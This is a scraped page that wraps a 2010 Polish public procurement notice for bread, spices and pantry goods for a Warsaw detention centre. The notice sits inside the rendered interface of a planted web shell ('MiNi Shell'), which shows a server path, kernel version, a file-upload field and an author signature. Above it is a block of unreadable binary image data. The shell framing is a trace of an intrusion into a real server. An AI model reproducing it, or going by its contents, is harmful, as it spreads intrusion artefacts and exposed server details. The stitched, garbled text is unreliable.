JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100512/119631-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawy chleba i przypraw do Aresztu Śledczego w Warszawie Grochowie. 
Znak sprawy 220/07/10/CP</b><br>
<b>Numer ogłoszenia: 119631 - 2010; data zamieszczenia: 12.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Warszawie-Grochów , ul. Chłopickiego 71A, 04-275 Warszawa, woj. mazowieckie, tel. 022 6105541, faks 022 6734501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Areszt Śledczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy chleba i przypraw do Aresztu Śledczego w Warszawie Grochowie. 
Znak sprawy 220/07/10/CP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Chleb pszenno-żytni - 120000 kg, CPV 15811100-7, PN-A-74103:1993, chleb pszenno-żytni, krojony, foliowany o wadze 350 g, bułka tarta - 1000 kg, CPV 15893000-4, PN-A-74113:1997, bułka tarta w opak. jednorazowym do 5 kg, ciasto drożdżowe - 150 kg, CPV 15812200-5, PN-A-88106:1998, ciasto drożdżowe, foliowane z kruszonką o wadze do 1 kg, 
Przyprawa do zup i potraw - 60 kg, CPV 15871270-7, PN-A-86967:1998, przyprawa do zup i potraw sypka, mieszanka przypraw, wielowarzywna w opak. do 5 kg, kwasek cytrynowy- 25 kg, CPV 15871000-4, PN-A-79734:1981, kwasek cytrynowy w opak. do 1 kg, liść laurowy - 20 kg, CPV 15871000-4, PN-A-86967:1998, liść laurowy suszony w opak. do 1 kg, majeranek - 20 kg, CPV 15872300-4, PN-A-86958:1997, majeranek suszony, przetarty, przyprawa w opak. do 1 kg, natka pietruszki - 50 kg, CPV 15871000-4, PN-A-86967:1998, pietruszka (natka) suszona w opak. do 1 kg, papryka ostra - 50 kg, CPV 15871000-4, PN-A-86955:1997, papryka mielona ostra w opak. do 1 kg, pieprz czarny- 50 kg, CPV 15872100-2, PN-A-86965:1997, pieprz czarny mielony w opak. do 1 kg, pieprz ziołowy- 30 kg, CPV 15872100-2, PN-A-86952:1997, pieprz ziołowy mielony w opak. do 1 kg, przyprawa do bigosu- 10 kg, CPV 15871270-7, PN-A-86967:1998, przyprawa do bigosu sypka w opak. do 1 kg, przyprawa do mięsa mielonego - 5 kg, CPV 15871270-7, PN-A-86967:1998, przyprawa do mięsa mielonego sypka w opak.do 1 kg, przyprawa do zup w płynie - 380 l, CPV 15871270-7, PN-A-86967:1998, przyprawa do zup i potraw w płynie w opak. do 1 l, sól - 2300 kg, CPV 15872400-5, PN-C 84081-2:1998, sól spożywcza, jodowana, drobnoziarnista w opak. do 25 kg, czosnek granulowany- 50 kg, CPV 15871000-4, PN-A-86967:1998, czosnek granulowany, w opak. do 1 kg, ziele angielskie - 30 kg, CPV 15871000-4, PN-A-86967:1998, ziele angielskie, w opak. do 1 kg, zupa grzybowa - 300 kg, CPV 15891400-4, zupa grzybowa w proszku, w opak. do 10 kg, żurek w proszku- 300 kg, CPV 15891400-4, żurek w proszku, w opak. do 10 kg, barszcz czerwony- 200 kg, CPV 15891400-4, barszcz czerwony w proszku, w opak. do 10 kg, cukier - 7000 kg, CPV 15831200-4, PN-A-74850:1996- cukier biały sypki w opak. do 25 kg, miód sztuczny - 800 kg, CPV 15831600-8, PN-A-77626:1988, miód sztuczny, w opak. do 10 kg, majonez - 300 kg, CPV 15871273-8, PN-A-86950:1995, majonez, w opak. do 1 kg, ocet spirytusowy 10% - 80 l, CPV 15871110-8, PN-EN 13188:2002, ocet spirytusowy 10%, w opak. 1 l, musztarda - 600 kg, CPV 15871250-1, PN-A-86964:2002, musztarda w opak. do 1 kg, herbata czarna - 500 kg, CPV 15863200-7, PN-ISO 3720:1997/Ap2:2006, herbata czarna, granulowana, w opak. do 10 kg, kawa zbożowa- 600 kg, CPV 15862000-8, PN-V-74029:2006, kawa zbożowa, sypka, w opak. do 10 kg, bulion drobiowy - 500 kg, CPV 15891500-5, bulion przyprawa sypka drobiowa w opak. do 25 kg, sos sałatkowy do surówek - 150 kg, CPV 15871260-4, sos sałatkowy w proszku w opak. do 10 kg, bulion wędzonka - 300 kg, CPV 15891500-5, bulion wędzonka w proszku w opak. do 10 kg, sos do spaghetti - 200 kg, CPV 15871260-4, sos do spaghetti w proszku, w opak. do 5 kg, sos myśliwski - 300 kg, CPV 15871260-4, sos myśliwski w proszku, w opak. do 10 kg,  makaron - 12000 kg, CPV 15851100-9, PN-A-74131:1999, makaron świderki, muszelki, nitki, jajeczny o barwie żółtej w opak. do 10 kg..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.89.30.00-4, 15.81.22.00-5, 15.87.12.70-7, 15.87.10.00-4, 15.87.21.00-2, 15.87.24.00-5, 15.89.14.00-4, 15.83.12.00-4, 15.83.16.00-8, 15.87.12.73-8, 15.87.11.10-8, 15.87.12.50-1, 15.86.32.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.89.15.00-5, 15.86.20.00-8, 15.85.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wynikać to będzie ze złożonego oświadczenia - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wynikać to będzie ze złożonego oświadczenia - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wynikać to będzie ze złożonego oświadczenia - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wynikać to będzie ze złożonego oświadczenia - załącznik nr 3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy Warszawa Grochów ul. Chłopickiego 71a 04-275 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2010 godzina 10:00, miejsce: Areszt Śledczy Warszawa Grochów ul. Chłopickiego 71a 04-275 Warszawa
pokój nr 4 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Chleb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenno-żytni - 120000 kg, CPV 15811100-7, PN-A-74103:1993, chleb pszenno-żytni, krojony, foliowany o wadze 350 g, bułka tarta - 1000 kg, CPV 15893000-4, PN-A-74113:1997, bułka tarta w opak. jednorazowym do 5 kg, ciasto drożdżowe - 150 kg, CPV 15812200-5, PN-A-88106:1998, ciasto drożdżowe, foliowane z kruszonką o wadze do 1 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.89.30.00-4, 15.81.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyprawa do zup i potraw - 60 kg, CPV 15871270-7, PN-A-86967:1998, przyprawa do zup i potraw sypka, mieszanka przypraw, wielowarzywna w opak. do 5 kg, kwasek cytrynowy- 25 kg, CPV 15871000-4, PN-A-79734:1981, kwasek cytrynowy w opak. do 1 kg, liść laurowy - 20 kg, CPV 15871000-4, PN-A-86967:1998, liść laurowy suszony w opak. do 1 kg, majeranek - 20 kg, CPV 15872300-4, PN-A-86958:1997, majeranek suszony, przetarty, przyprawa w opak. do 1 kg, natka pietruszki - 50 kg, CPV 15871000-4, PN-A-86967:1998, pietruszka (natka) suszona w opak. do 1 kg, papryka ostra - 50 kg, CPV 15871000-4, PN-A-86955:1997, papryka mielona ostra w opak. do 1 kg, pieprz czarny- 50 kg, CPV 15872100-2, PN-A-86965:1997, pieprz czarny mielony w opak. do 1 kg, pieprz ziołowy- 30 kg, CPV 15872100-2, PN-A-86952:1997, pieprz ziołowy mielony w opak. do 1 kg, przyprawa do bigosu- 10 kg, CPV 15871270-7, PN-A-86967:1998, przyprawa do bigosu sypka w opak. do 1 kg, przyprawa do mięsa mielonego - 5 kg, CPV 15871270-7, PN-A-86967:1998, przyprawa do mięsa mielonego sypka w opak.do 1 kg, przyprawa do zup w płynie - 380 l, CPV 15871270-7, PN-A-86967:1998, przyprawa do zup i potraw w płynie w opak. do 1 l, sól - 2300 kg, CPV 15872400-5, PN-C 84081-2:1998, sól spożywcza, jodowana, drobnoziarnista w opak. do 25 kg, czosnek granulowany- 50 kg, CPV 15871000-4, PN-A-86967:1998, czosnek granulowany, w opak. do 1 kg, ziele angielskie - 30 kg, CPV 15871000-4, PN-A-86967:1998, ziele angielskie, w opak. do 1 kg, zupa grzybowa - 300 kg, CPV 15891400-4, zupa grzybowa w proszku, w opak. do 10 kg, żurek w proszku- 300 kg, CPV 15891400-4, żurek w proszku, w opak. do 10 kg, barszcz czerwony- 200 kg, CPV 15891400-4, barszcz czerwony w proszku, w opak. do 10 kg, cukier - 7000 kg, CPV 15831200-4, PN-A-74850:1996- cukier biały sypki w opak. do 25 kg, miód sztuczny - 800 kg, CPV 15831600-8, PN-A-77626:1988, miód sztuczny, w opak. do 10 kg, majonez - 300 kg, CPV 15871273-8, PN-A-86950:1995, majonez, w opak. do 1 kg, ocet spirytusowy 10% - 80 l, CPV 15871110-8, PN-EN 13188:2002, ocet spirytusowy 10%, w opak. 1 l, musztarda - 600 kg, CPV 15871250-1, PN-A-86964:2002, musztarda w opak. do 1 kg, herbata czarna - 500 kg, CPV 15863200-7, PN-ISO 3720:1997/Ap2:2006, herbata czarna, granulowana, w opak. do 10 kg, kawa zbożowa- 600 kg, CPV 15862000-8, PN-V-74029:2006, kawa zbożowa, sypka, w opak. do 10 kg, bulion drobiowy - 500 kg, CPV 15891500-5, bulion przyprawa sypka drobiowa w opak. do 25 kg, sos sałatkowy do surówek - 150 kg, CPV 15871260-4, sos sałatkowy w proszku w opak. do 10 kg, bulion wędzonka - 300 kg, CPV 15891500-5, bulion wędzonka w proszku w opak. do 10 kg, sos do spaghetti - 200 kg, CPV 15871260-4, sos do spaghetti w proszku, w opak. do 5 kg, sos myśliwski - 300 kg, CPV 15871260-4, sos myśliwski w proszku, w opak. do 10 kg,  makaron - 12000 kg, CPV 15851100-9, PN-A-74131:1999, makaron świderki, muszelki, nitki, jajeczny o barwie żółtej w opak. do 10 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.70-7, 15.87.10.00-4, 15.87.21.00-2, 15.87.24.00-5, 15.89.14.00-4, 15.83.16.00-8, 15.87.12.73-8, 15.87.11.10-8, 15.87.12.50-1, 15.86.32.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.89.15.00-5, 15.86.20.00-8, 15.85.11.00-7, 15.83.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com